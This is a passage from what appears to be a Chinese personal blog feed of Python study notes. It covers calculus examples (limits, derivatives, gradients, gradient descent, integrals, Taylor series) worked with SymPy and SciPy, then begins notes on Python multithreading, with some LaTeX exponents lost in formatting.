    $\frac1zdz=\left[4ln(3x2+y2)+\frac{24x2+12xy}{3x2+y2}\right]dx+\left[2ln(3x2+y2)+\frac{8xy+2y2}{3x2+y2}\right]dy$

    import sympy
    from sympy.abc import x, y, z

    z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
    zx = sympy.diff(z, x)
    zx

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{6 x \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 4 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    zx.evalf(subs={x:1, y:2})

    $\displaystyle 84401203.0927369$

    zy = sympy.diff(z, y)
    zy

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{2 y \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 2 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    zy.evalf(subs={x:1, y:2})

    $\displaystyle 48788945.5463684$

    求方向导数和梯度

    求函数$z=x2+y2$在点$(1,2)$处沿点$(1,2)$到点$(2,2+\sqrt{3})$方向的方向导数, 以及在点$(1,2)$的梯度

    import sympy as sp
    import numpy as np
    from sympy.abc import x, y, z

    z = x ** 2 + y ** 2
    zx, zy = z.diff(x), z.diff(y)
    gradz = np.array([zx.evalf(subs={x:1, y:2}), zy.evalf(subs={x:1, y:2})], dtype=float) # 求梯度
    gradz
    array([2., 4.])
    A = np.array([1, 2])
    B = np.array([2, 2 + 3 ** 0.5], dtype=float)
    gradz * (B - A) / np.linalg.norm(B - A) # 计算方向导数
    array([1.        , 3.46410162])

    3 微积分

    例 3.6 定积分

    应用 SciPy 科学计算库求$\int_{0}^{3} cos2(ex)dx$

    import numpy as np
    from scipy.integrate import quad

    func = lambda x:np.cos(np.exp(x)) ** 2 # 定义被积分函数
    quad(func, 0, 3) # 调用 quad 积分函数
    (1.296467785724373, 1.397797133112089e-09)

    输出结果(积分值, 误差)

    例 3.7 二重积分

    求$\iint_{D}e{-xx-y^2}dxdy$, 其中$D=\left { (x,y) | 0 \le x \le 10,0 \le y \le 10\right }$

    import numpy as np
    from scipy.integrate import dblquad # 二重积分


    def integrand(x,y):
    return np.exp(-x ** 2 - y ** 2)

    x_a = 0
    x_b = 10
    y_a = 0
    y_b = 10
    """
    scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
    参数:
    func:可调用的
    至少有两个变量的 Python 函数或方法:y 必须是第一个参数,x 必须是第二个参数。

    a, b:浮点数
    x:a < b 的积分极限

    gfun:可调用或浮点数
    y 中的下边界曲线,它是一个函数,采用单个浮点参数 (x) 并返回浮点结果或表示恒定边界曲线的浮点数。

    hfun:可调用或浮点数
    y 中的上边界曲线(与 gfun 的要求相同)。

    args:顺序,可选
    传递给 func 的额外参数。

    epsabs:浮点数,可选
    绝对容差直接传递到内部一维正交积分。默认值为 1.49e-8。dblquad 尝试获得 abs(i-result) <= max(epsabs, epsrel*abs(i)) 的精度,其中 i = 从 gfun(x) 到 hfun(x) 的 func(y, x) 的内部积分,而 result 是数值近似值。请参阅下面的 epsrel。

    epsrel:浮点数,可选
    内部一维积分的相对容差。默认值为 1.49e-8。如果 epsabs <= 0, epsrel 必须大于 5e-29 和 50 * (machine epsilon).看易胜宝更多。

    返回:
    y:浮点数
    结果积分。

    abserr:浮点数
    误差的估计。
    """
    dblquad(integrand, x_a, x_b, lambda x:y_a, lambda x:y_b)
    (0.7853981633974476, 1.375309851021853e-08)

    例 3.8 定积分近似求解

    用定义法求$\int_{0}^{3} cos2(ex)dx$的近似解

    from numpy import *

    a, b = 0, 3


    def f(x):
    return cos(exp(x)) ** 2


    def trape(n):
    h = (b - a) / n # 将区间分成 n 等分后的长度
    x = a
    sum = 0
    for i in range(1, n):
    x2 = a + i * h
    sum += (f(x) + f(x2)) * h / 2 # 小梯形的值(上底加下底的和乘高除以二)
    x = x2
    return sum
    trape(10)
    0.944822326405313
    trape(100)
    1.2843391540917448
    trape(1000)
    1.2960750567338157

    不定积分

    $ \int lnx $

    from sympy import *
    from sympy.abc import x

    expr = log(x)
    integrate(expr,x)

    $\displaystyle x \log{\left(x \right)} - x$

    3.8 习题

    $\int _{1}^{2} x^2 + \frac {1}{x^4}dx$

    $ =(\frac {1}{3}x^3 - \frac {1}{3}x^{-3}) | _{1}^{2}$

    $ = \frac {21}{8}$

    import numpy as np
    from scipy.integrate import quad

    func = lambda x: x ** 2 + x ** (-4)
    quad(func, 1, 2)
    (2.625, 2.914335439641036e-14)

    $ \int _{-1}^{0}\frac {3x4+3x2+1}{x^2+1}dx$

    $ =\int _{-1}{0}3x2+\frac {1}{1+x^2}dx$

    $ = (x^3 + arctanx)| _{-1}^{0} $

    $ = 1 + \frac{\pi}{4} $

    import numpy as np
    from scipy.integrate import quad

    func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
    quad(func, -1, 0)
    (1.7853981633974483, 1.9821901491273144e-14)

    利用定积分的定义计算极限:

    $ lim _{n \to \infty}\frac {1{p}+2{p}+…+n{p}}{n{p+1}}$

    $ = lim {n \to \infty}\frac {\sum{i=1}{n}ip}{n^{p+1}} $

    $ = \frac{1}{n} lim {n \to \infty}\sum{i=1}{n}(\frac{i}{n})p $

    $ = \int _{0}{1}xpdx $

    $ = \frac {1}{p+1} $

    4 泰勒公式与拉格朗日乘子法

    指对连, 三角断,
    三角对数隔一换, 三角指数有感叹

    例 4.7 根据$e^x$的$n$次泰勒多项式展开式, 计算$e$的近似值

    $ e\approx 1+1+\frac{1}{2!}+\frac{1}{3!}+…+\frac{1}{n!}$

    import numpy as np
    import pandas as pd


    def f(n):
    sum1 = 1
    if n == 0:
    sum1 = 1
    else:
    m = n + 1
    for i in range(1, m):
    sum2 = 1.0
    k = i + 1
    for j in range(1, k):
    sum2 = sum2 * j
    sum1 = sum1 + 1.0 / sum2
    return sum1


    num = 10
    pd.DataFrame(np.array([[i,f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])
    n e
    0 1.0 2.000000
    1 2.0 2.500000
    2 3.0 2.666667
    3 4.0 2.708333
    4 5.0 2.716667
    5 6.0 2.718056
    6 7.0 2.718254
    7 8.0 2.718279
    8 9.0 2.718282
    9 10.0 2.718282

    例 4.13 $sinx$的$n$阶泰勒多项式

    $sinx = x - \frac {x^3}{3!} + \frac {x^5}{5!} - \frac {x^7}{7!} + …+ (-1)^{m-1}\frac {x^{2m-1}}{(2m-1)!}+R_{2m}(x)$

    import numpy as np
    import pandas as pd


    def fsin(x):
    m = 20 # 项数
    sum = 0.0
    for i in range(1, m+1):
    n = 2 * i - 1 # 2m-1
    temp1, temp2, temp3 = 1, 1, 1
    for j in range(1, i): # (-1)^(m-1)
    temp1 = -temp1
    for j in range(1, n + 1):
    temp2 = temp2 * x # x^(2m-1)
    temp3 = temp3 * j # (2m-1)!
    sum += temp1 * temp2 / temp3
    return sum


    pd.DataFrame({'np.sin(x)': np.array([np.sin(x) for x in range(-20, 1)]),
    'fsin(x)': np.array([fsin(x) for x in range(-20, 1)]),
    'error': np.array([fsin(x) - np.sin(x) for x in range(-20, 1)])},
    index=np.array([x for x in range(-20, 1)]))
    np.sin(x) fsin(x) error
    -20 -0.912945 5364.411846 5.365325e+03
    -19 -0.149877 666.994385 6.671443e+02
    -18 0.750987 74.739042 7.398806e+01
    -17 0.961397 8.185042 7.223645e+00
    -16 0.287903 0.899283 6.113793e-01
    -15 -0.650288 -0.606249 4.403901e-02
    -14 -0.990607 -0.987967 2.640574e-03
    -13 -0.420167 -0.420039 1.282664e-04
    -12 0.536573 0.536578 4.880595e-06
    -11 0.999990 0.999990 1.394300e-07
    -10 0.544021 0.544021 2.831679e-09
    -9 -0.412118 -0.412118 3.790196e-11
    -8 -0.989358 -0.989358 2.858824e-13
    -7 -0.656987 -0.656987 3.441691e-15
    -6 0.279415 0.279415 3.497203e-15
    -5 0.958924 0.958924 -2.775558e-15
    -4 0.756802 0.756802 -6.661338e-16
    -3 -0.141120 -0.141120 1.110223e-16
    -2 -0.909297 -0.909297 0.000000e+00
    -1 -0.841471 -0.841471 0.000000e+00
    0 0.000000 0.000000 0.000000e+00

    4.9 习题

    $lim _{x \to 0}(\frac {sinx-xcosx}{sin^3x})$

    $=lim _{x \to 0}\frac {x-\frac{1}{6}x3-x(1-\frac{1}{2}x2)}{x^3}$

    $=lim _{x \to 0}\frac {-\frac{1}{6}x3+\frac{1}{2}x3}{x^3}$

    $=\frac{1}{3}$

    import sympy
    from sympy import sin, cos, limit

    x = sympy.Symbol('x')
    f = (sin(x) - x * cos(x)) / (sin(x) ** 3)
    limit(f, x, 0)

    $\displaystyle \frac{1}{3}$

    ]]>
    + 前言
    • 买了一本迪哥写的《人工智能数学基础》,在掌握了 Python 的基本用法后,着手学习其中的内容
    • 里面很多都是考研数学的内容,让我意识到数学没有想象中的那么“没用”
    • Python 有很多封装好的数学工具,正文中有大量的数学公式使用了 LateX 的语句,参考在线 LaTeX 公式编辑器-编辑器 (latexlive.com),很遗憾没能在本科期间认识到它们
    • 有些 LateX 语句并不能正确地渲染, 先凑合着用吧

    1 基础篇

    2 高等数学基础

    例 2.6 求$\lim_{x \to 1}\frac{x ^ 2 - 1}{x - 1}$ 的极限

    1
    2
    3
    4
    5
    6
    import sympy
    from sympy import oo
    import numpy as np
    x = sympy.Symbol('x')
    f = (x ** 2 - 1) / (x - 1)
    sympy.limit(f, x, 1) # limit(数学表达式 expression, 变量 variable, 要趋向的值 value)

    $\displaystyle 2$

    例 2.11 求$y = arcsin\sqrt{sinx}$的导数

    $y’=\frac{1}{\sqrt{1-sinx} }\cdot\frac{1}{2\sqrt{sinx}}\cdot{cosx}=\frac{cosx}{2\sqrt{sinx-sin^2x}}$

    1
    2
    3
    from sympy import *
    from sympy.abc import x # 导入变量 x
    diff(asin(sqrt(sin(x)))) # diff 求导函数

    $\displaystyle \frac{\cos{\left(x \right)}}{2 \sqrt{1 - \sin{\left(x \right)}} \sqrt{\sin{\left(x \right)}}}$

    例 2.12 求$f(x,y)=x2+3xy+y2$在点$(1,2)$处的偏导数

    $f_{x}(x,y)=2x+3y$

    $f _{y}(x,y)=3x+2y$

    $ f _{x}(1,2)=2x+3y| _{y=2}^{x=1}=8$

    $f _{y}(1,2)=3x+2y| _{y=2}^{x=1}=7$

    1
    2
    3
    4
    from sympy import *
    from sympy.abc import x, y, f
    f = x ** 2 + 3 * x * y + y ** 2
    diff(f, x) # 对 x 求偏导

    $\displaystyle 2 x + 3 y$

    1
    diff(f, y)

    $\displaystyle 3 x + 2 y$

    1
    2
    fx = diff(f, x)
    fx.evalf(subs={x:1, y:2}) # 以字典的形式传入多个变量的值, 返回计算后的数学表达式。

    $\displaystyle 8.0$

    1
    2
    fy = diff(f, y)
    fy.evalf(subs={x:1, y:2})

    $\displaystyle 7.0$

    2.6 方向导数 2.7 梯度

    函数在某点的梯度是一个向量, 它的方向与取得最大方向导数的方向一致

    $gradf(x,y)=\frac{\partial f}{\partial x}\textbf{i}+\frac{\partial f}{\partial y}\textbf{j} $

    $\frac{\partial f}{\partial l}=gradf\cdot \frac{\overrightarrow{l}}{\left | \overrightarrow{l} \right | }$

    用梯度gradf点乘l的单位向量就得到方向导数, 这是计算方向导数最简便的方法

    例 2.15 用 Python 编程实现梯度下降法求解$f(x,y)=x-y+2x2+2xy+y2$的最小值

    使用常规方法:

    $z=x-y+2x2+2xy+y2$

    $z’_{x}=1+4x+2y$

    $z’_{y}=-1+2x+2y$

    求得驻点$(-1,\frac{3}{2})$

    $A=z’'_{xx}| _{y=\frac{3}{2}}^{x=-1}=4$

    $B=z’'_{xy}| _ {y=\frac{3}{2}}^{x=-1}=2$

    $C=z’'_{yy}| _ {y=\frac{3}{2}}^{x=-1}=2$

    $AC-B^2>0$

    $A>0$

    原函数在$(-1,\frac{3}{2})$处具有极小值

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    import numpy as np


    def Fun(x, y): # 原函数
    return x - y + 2 * x * x + 2 * x * y + y * y


    def PxFun(x, y): # 对 x 求偏导
    return 1 + 4 * x + 2 * y


    def PyFun(x, y): # 对 y 求偏导
    return -1 + 2 * x + 2 * y


    if __name__ == "__main__":
    fig = plt.figure() # 创建自定义图象
    # MatplotlibDeprecationWarning: Axes3D(fig) adding itself to the figure is deprecated since 3.4.
    # Pass the keyword argument auto_add_to_figure=False and use fig.add_axes(ax) to suppress this warning.
    # The default value of auto_add_to_figure will change to False in mpl3.5 and True values will no longer work in 3.6.
    ax = Axes3D(fig, auto_add_to_figure=False) # 创建 3D 图象
    fig.add_axes(ax)
    # 在绘制三维图表时, 需要用到 mgrid 函数, 它会返回一个密集的多维网格
    # np.mgrid[开始坐标:结束坐标:步长(步长为复数表示点数,左闭右闭, 步长为实数表示间隔,左闭右开)]
    X, Y = np.mgrid[-2:2:40j, -2:2:40j]
    Z = Fun(X, Y)
    # ax.plot_surface: https://blog.csdn.net/weixin_43584807/article/details/102331755
    # X, Y, Z 2D 数组形式的数据值
    # rstride 数组行距
    # cstride 数组列距
    # cmap 曲面块颜色映射
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap="rainbow")
    ax.set_xlabel('x') # 设置坐标轴标签
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    # 梯度下降
    step = 0.008 # 取步长
    x = 0 # 初始值
    y = 0
    tag_x = [x] # 绘制图像的列表
    tag_y = [y]
    tag_z = [Fun(x, y)]
    new_x = x
    new_y = y
    Over = False
    while not Over:
    new_x -= step * PxFun(x, y) # 往最大方向减少
    new_y -= step * PyFun(x, y)
    if Fun(x, y) - Fun(new_x, new_y) < 7e-9:
    Over = True
    x = new_x # 更新数据
    y = new_y
    tag_x.append(x) # 添加用于绘制图象的点
    tag_y.append(y)
    tag_z.append(Fun(x, y))
    ax.plot(tag_x, tag_y, tag_z, 'r+]') # 绘制点: 'r'表示红色(好像没有作用?)
    print('(x, y)~(' + str(x) + ',' + str(y) + ')') # 输出结果
    plt.show() # 显示图象

    (x, y)~(-0.9993608094022046,1.498965767887478)

    png

    2.9.5 高手点拨: 求导的三种方式

    已知$f(x)=x5+2x4+3x^2+5$, 求$f’(1)$

    使用 Sympy 的 diff 函数
    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, f

    f = x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5
    fx = sympy.diff(f)
    fx.evalf(subs={x:1})

    $\displaystyle 19.0$

    使用 scipy.misc 模块下的 derivative 函数
    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np
    from scipy.misc import derivative


    def f(x):
    return x ** 5 + 2 * x ** 4 + 3 * x ** 2 + 5

    derivative(func=f, x0=1, dx=1e-6, n=1) # 函数为 f, 取值为 1, 间距为 1e-6, 一阶导数
    18.999999999991246
    使用 NumPy 模块里的 poly1d 构造$f(x)$
    1
    2
    3
    4
    import numpy as np

    p = np.poly1d([1, 2, 0, 3, 0, 5]) # 构造多项式
    np.polyder(p, 1)(1.0) # 一阶导数在 x=1.0 时的取值
    19.0
    1
    p.deriv(1)(1.0)  # 一阶导数在 x=1.0 时的取值
    19.0

    2.10 习题

    $lim_{x\to1}sin(lnx)$
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, f

    f = sympy.sin(sympy.log(x))
    sympy.limit(f, x, 1)

    $\displaystyle 0$

    $lim_{x\to8}\frac{\sqrt[3]{x}-2}{x-8}$
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, f

    f = (x ** (1/3) - 2) / (x - 8)
    sympy.limit(f, x, 8)

    $\displaystyle \frac{1}{12}$

    求$y=x4-2x3+5sinx+ln3$的导数
    1
    2
    3
    4
    5
    import sympy
    from sympy.abc import x, y

    y = x ** 4 - 2 * x ** 3 + 5 * sympy.sin(x) + sympy.log(3)
    diff(y)

    $\displaystyle 4 x^{3} - 6 x^{2} + 5 \cos{\left(x \right)}$

    求$z=(3x2+y2)^{4x+2y}$在点$(1,2)$的偏导数

    $lnz=(4x+2y)\cdot ln(3x2+y2)$

    $\frac1zdz=\left[4ln(3x2+y2)+\frac{24x2+12xy}{3x2+y2}\right]dx+\left[2ln(3x2+y2)+\frac{8xy+2y2}{3x2+y2}\right]dy$

    1
    2
    3
    4
    5
    6
    import sympy
    from sympy.abc import x, y, z

    z = (3 * x ** 2 + y ** 2) ** (4 * x + 2 * y)
    zx = sympy.diff(z, x)
    zx

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{6 x \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 4 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    1
    zx.evalf(subs={x:1, y:2})

    $\displaystyle 84401203.0927369$

    1
    2
    zy = sympy.diff(z, y)
    zy

    $\displaystyle \left(3 x^{2} + y{2}\right){4 x + 2 y} \left(\frac{2 y \left(4 x + 2 y\right)}{3 x^{2} + y^{2}} + 2 \log{\left(3 x^{2} + y^{2} \right)}\right)$

    1
    zy.evalf(subs={x:1, y:2})

    $\displaystyle 48788945.5463684$

    求方向导数和梯度

    求函数$z=x2+y2$在点$(1,2)$处沿点$(1,2)$到点$(2,2+\sqrt{3})$方向的方向导数, 以及在点$(1,2)$的梯度

    1
    2
    3
    4
    5
    6
    7
    8
    import sympy as sp
    import numpy as np
    from sympy.abc import x, y, z

    z = x ** 2 + y ** 2
    zx, zy = z.diff(x), z.diff(y)
    gradz = np.array([zx.evalf(subs={x:1, y:2}), zy.evalf(subs={x:1, y:2})], dtype=float) # 求梯度
    gradz
    array([2., 4.])
    1
    2
    3
    A = np.array([1, 2])
    B = np.array([2, 2 + 3 ** 0.5], dtype=float)
    gradz * (B - A) / np.linalg.norm(B - A) # 计算方向导数
    array([1.        , 3.46410162])

    3 微积分

    例 3.6 定积分

    应用 SciPy 科学计算库求$\int_{0}^{3} cos2(ex)dx$

    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x:np.cos(np.exp(x)) ** 2 # 定义被积分函数
    quad(func, 0, 3) # 调用 quad 积分函数
    (1.296467785724373, 1.397797133112089e-09)

    输出结果(积分值, 误差)

    例 3.7 二重积分

    求$\iint_{D}e{-xx-y^2}dxdy$, 其中$D=\left { (x,y) | 0 \le x \le 10,0 \le y \le 10\right }$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import numpy as np
    from scipy.integrate import dblquad # 二重积分


    def integrand(x,y):
    return np.exp(-x ** 2 - y ** 2)

    x_a = 0
    x_b = 10
    y_a = 0
    y_b = 10
    """
    scipy.integrate.dblquad(func, a, b, gfun, hfun, args=(), epsabs=1.49e-08, epsrel=1.49e-08)
    参数:
    func:可调用的
    至少有两个变量的 Python 函数或方法:y 必须是第一个参数,x 必须是第二个参数。

    a, b:浮点数
    x:a < b 的积分极限

    gfun:可调用或浮点数
    y 中的下边界曲线,它是一个函数,采用单个浮点参数 (x) 并返回浮点结果或表示恒定边界曲线的浮点数。

    hfun:可调用或浮点数
    y 中的上边界曲线(与 gfun 的要求相同)。

    args:顺序,可选
    传递给 func 的额外参数。

    epsabs:浮点数,可选
    绝对容差直接传递到内部一维正交积分。默认值为 1.49e-8。dblquad 尝试获得 abs(i-result) <= max(epsabs, epsrel*abs(i)) 的精度,其中 i = 从 gfun(x) 到 hfun(x) 的 func(y, x) 的内部积分,而 result 是数值近似值。请参阅下面的 epsrel。

    epsrel:浮点数,可选
    内部一维积分的相对容差。默认值为 1.49e-8。如果 epsabs <= 0, epsrel 必须大于 5e-29 和 50 * (machine epsilon).看易胜宝更多。

    返回:
    y:浮点数
    结果积分。

    abserr:浮点数
    误差的估计。
    """
    dblquad(integrand, x_a, x_b, lambda x:y_a, lambda x:y_b)
    (0.7853981633974476, 1.375309851021853e-08)

    例 3.8 定积分近似求解

    用定义法求$\int_{0}^{3} cos2(ex)dx$的近似解

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from numpy import *

    a, b = 0, 3


    def f(x):
    return cos(exp(x)) ** 2


    def trape(n):
    h = (b - a) / n # 将区间分成 n 等分后的长度
    x = a
    sum = 0
    for i in range(1, n):
    x2 = a + i * h
    sum += (f(x) + f(x2)) * h / 2 # 小梯形的值(上底加下底的和乘高除以二)
    x = x2
    return sum
    1
    trape(10)
    0.944822326405313
    1
    trape(100)
    1.2843391540917448
    1
    trape(1000)
    1.2960750567338157

    不定积分

    $ \int lnx $

    1
    2
    3
    4
    5
    from sympy import *
    from sympy.abc import x

    expr = log(x)
    integrate(expr,x)

    $\displaystyle x \log{\left(x \right)} - x$

    3.8 习题

    $\int _{1}^{2} x^2 + \frac {1}{x^4}dx$

    $ =(\frac {1}{3}x^3 - \frac {1}{3}x^{-3}) | _{1}^{2}$

    $ = \frac {21}{8}$

    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: x ** 2 + x ** (-4)
    quad(func, 1, 2)
    (2.625, 2.914335439641036e-14)

    $ \int _{-1}^{0}\frac {3x4+3x2+1}{x^2+1}dx$

    $ =\int _{-1}{0}3x2+\frac {1}{1+x^2}dx$

    $ = (x^3 + arctanx)| _{-1}^{0} $

    $ = 1 + \frac{\pi}{4} $

    1
    2
    3
    4
    5
    import numpy as np
    from scipy.integrate import quad

    func = lambda x: (3 * x ** 4 + 3 * x ** 2 + 1) / (1 + x ** 2)
    quad(func, -1, 0)
    (1.7853981633974483, 1.9821901491273144e-14)

    利用定积分的定义计算极限:

    $ lim _{n \to \infty}\frac {1{p}+2{p}+…+n{p}}{n{p+1}}$

    $ = lim {n \to \infty}\frac {\sum{i=1}{n}ip}{n^{p+1}} $

    $ = \frac{1}{n} lim {n \to \infty}\sum{i=1}{n}(\frac{i}{n})p $

    $ = \int _{0}{1}xpdx $

    $ = \frac {1}{p+1} $

    4 泰勒公式与拉格朗日乘子法

    指对连, 三角断,
    三角对数隔一换, 三角指数有感叹

    例 4.7 根据$e^x$的$n$次泰勒多项式展开式, 计算$e$的近似值

    $ e\approx 1+1+\frac{1}{2!}+\frac{1}{3!}+…+\frac{1}{n!}$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import numpy as np
    import pandas as pd


    def f(n):
    sum1 = 1
    if n == 0:
    sum1 = 1
    else:
    m = n + 1
    for i in range(1, m):
    sum2 = 1.0
    k = i + 1
    for j in range(1, k):
    sum2 = sum2 * j
    sum1 = sum1 + 1.0 / sum2
    return sum1


    num = 10
    pd.DataFrame(np.array([[i,f(i)] for i in range(1, num + 1)]), columns=['n', 'e'])
    n e
    0 1.0 2.000000
    1 2.0 2.500000
    2 3.0 2.666667
    3 4.0 2.708333
    4 5.0 2.716667
    5 6.0 2.718056
    6 7.0 2.718254
    7 8.0 2.718279
    8 9.0 2.718282
    9 10.0 2.718282

    例 4.13 $sinx$的$n$阶泰勒多项式

    $sinx = x - \frac {x^3}{3!} + \frac {x^5}{5!} - \frac {x^7}{7!} + …+ (-1)^{m-1}\frac {x^{2m-1}}{(2m-1)!}+R_{2m}(x)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import numpy as np
    import pandas as pd


    def fsin(x):
    m = 20 # 项数
    sum = 0.0
    for i in range(1, m+1):
    n = 2 * i - 1 # 2m-1
    temp1, temp2, temp3 = 1, 1, 1
    for j in range(1, i): # (-1)^(m-1)
    temp1 = -temp1
    for j in range(1, n + 1):
    temp2 = temp2 * x # x^(2m-1)
    temp3 = temp3 * j # (2m-1)!
    sum += temp1 * temp2 / temp3
    return sum


    pd.DataFrame({'np.sin(x)': np.array([np.sin(x) for x in range(-20, 1)]),
    'fsin(x)': np.array([fsin(x) for x in range(-20, 1)]),
    'error': np.array([fsin(x) - np.sin(x) for x in range(-20, 1)])},
    index=np.array([x for x in range(-20, 1)]))
    np.sin(x) fsin(x) error
    -20 -0.912945 5364.411846 5.365325e+03
    -19 -0.149877 666.994385 6.671443e+02
    -18 0.750987 74.739042 7.398806e+01
    -17 0.961397 8.185042 7.223645e+00
    -16 0.287903 0.899283 6.113793e-01
    -15 -0.650288 -0.606249 4.403901e-02
    -14 -0.990607 -0.987967 2.640574e-03
    -13 -0.420167 -0.420039 1.282664e-04
    -12 0.536573 0.536578 4.880595e-06
    -11 0.999990 0.999990 1.394300e-07
    -10 0.544021 0.544021 2.831679e-09
    -9 -0.412118 -0.412118 3.790196e-11
    -8 -0.989358 -0.989358 2.858824e-13
    -7 -0.656987 -0.656987 3.441691e-15
    -6 0.279415 0.279415 3.497203e-15
    -5 0.958924 0.958924 -2.775558e-15
    -4 0.756802 0.756802 -6.661338e-16
    -3 -0.141120 -0.141120 1.110223e-16
    -2 -0.909297 -0.909297 0.000000e+00
    -1 -0.841471 -0.841471 0.000000e+00
    0 0.000000 0.000000 0.000000e+00

    4.9 习题

    $lim _{x \to 0}(\frac {sinx-xcosx}{sin^3x})$

    $=lim _{x \to 0}\frac {x-\frac{1}{6}x3-x(1-\frac{1}{2}x2)}{x^3}$

    $=lim _{x \to 0}\frac {-\frac{1}{6}x3+\frac{1}{2}x3}{x^3}$

    $=\frac{1}{3}$

    1
    2
    3
    4
    5
    6
    import sympy
    from sympy import sin, cos, limit

    x = sympy.Symbol('x')
    f = (sin(x) - x * cos(x)) / (sin(x) ** 3)
    limit(f, x, 0)

    $\displaystyle \frac{1}{3}$

    ]]>
    @@ -10185,7 +10185,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88multithreading%EF%BC%89/ - 正文

    2 添加线程 add thread

    import threading

    显示线程的状态

    threading.active_count()  # 显示有多少个已经激活的线程
    6
    threading.enumerate()  # 显示已经激活的现场具体情况
    [<_MainThread(MainThread, started 5844)>, <Thread(IOPub, started daemon 7116)>, <Heartbeat(Heartbeat, started daemon 9816)>, <ControlThread(Control, started daemon 4020)>, <HistorySavingThread(IPythonHistorySavingThread, started 4124)>, <ParentPollerWindows(Thread-4, started daemon 10940)>]
    threading.current_thread()  # 显示正在运行的线程
    <_MainThread(MainThread, started 5844)>

    添加一个线程

    def thread_job():
    print("Thid is an added Thread, number is %s" % threading.current_thread())
    def main():
    added_thread = threading.Thread(target=thread_job) # 添加一个线程: 目标 thread_job
    added_thread.start() # 运行这个线程

    if __name__ == "__main__":
    main()
    Thid is an added Thread, number is <Thread(Thread-8, started 7464)>

    3 join 功能

    import threading
    import time
    def thread_job():
    print("T1start\n")
    for i in range(10):
    time.sleep(0.1) # 每步暂停 0.1 秒
    print("T1 finish\n")

    def T2_job():
    print('T2start\n')
    print('T2 finish')


    def main():
    added_thread = threading.Thread(target=thread_job, name='T1')
    thread2 = threading.Thread(target=T2_job, name='T2')

    added_thread.start()
    thread2.start()

    added_thread.join() # 加入到主线程
    thread2.join()

    print('all done\n')

    if __name__ == "__main__":
    main()
    T1startT2startT2 finishT1 finishall done

    ​ 当加入到主线程后,主线程中所有线程执行完毕后才会打印’all done\n’

    4 Quene 功能

    处理多线程中 target 函数没有返回值的情况

    import threading
    import time
    from queue import Queue


    def job(l, q):
    for i in range(len(l)):
    l[i] **= 2
    q.put(l) # 将计算后的列表放到 q 中


    def multithreading():
    q = Queue()
    threads = []
    data = [[1, 2, 3], [3, 4, 5], [4, 4, 4], [5, 5, 5]]
    for i in range(4): # 创建 4 个线程
    t = threading.Thread(target=job, args=(data[i], q)) # args 给 target 函数传递参数
    t.start()
    threads.append(t)
    for thread in threads:
    thread.join()
    results = []
    for _ in range(4):
    results.append(q.get()) # 从队列中拿出数据, 加入到 results 列表中
    print(results)


    if __name__ == '__main__':
    multithreading()
    [[1, 4, 9], [9, 16, 25], [16, 16, 16], [25, 25, 25]]

    5 不一定有效率 GIL

    • 在处理较简单的问题时, 由于切换线程需要耗费时间(GIL), 多线程不一定比单线程用时更短(每个时刻只能有一个线程在 CPU 工作)
    • 为什么多线程有时候会比单线程耗时更短? 因为有些时候会边运算边读写数据. 解决方法: 多核运算
    • 分别用常规方法和多线程方法计算 0-99999 求和的四倍
      Python GIL 全局解释器锁详解(深度剖析)
    import threading
    from queue import Queue
    import copy
    import time


    def job(l, q):
    res = sum(l)
    q.put(res)


    def multithreading(l): # 多线程方法
    q = Queue()
    threads = []
    for i in range(4):
    t = threading.Thread(target=job, args=(copy.copy(l), q), name='T%i' % i)
    t.start()
    threads.append(t)
    [t.join() for t in threads]
    total = 0
    for _ in range(4):
    total += q.get()
    print(total)


    def normal(l): # 常规方法
    total = sum(l) # 对序列求和
    print(total)


    if __name__ == '__main__':
    l = list(range(1000_000))

    s_t = time.time()
    normal(l * 4)
    print('normal:', time.time() - s_t)

    s_t = time.time()
    multithreading(l)
    print('multithreading:', time.time() - s_t)
    1999998000000normal: 0.16908121109008791999998000000multithreading: 0.24041318893432617

    6 锁 lock

    一般只有在共享内存时才会用得到, 防止不同次运行程序时出现不同的情况

    未添加锁的情况

    import threading


    def job1():
    global A # A 是一个全局变量
    for i in range(10):
    A += 1
    print('job1', A)


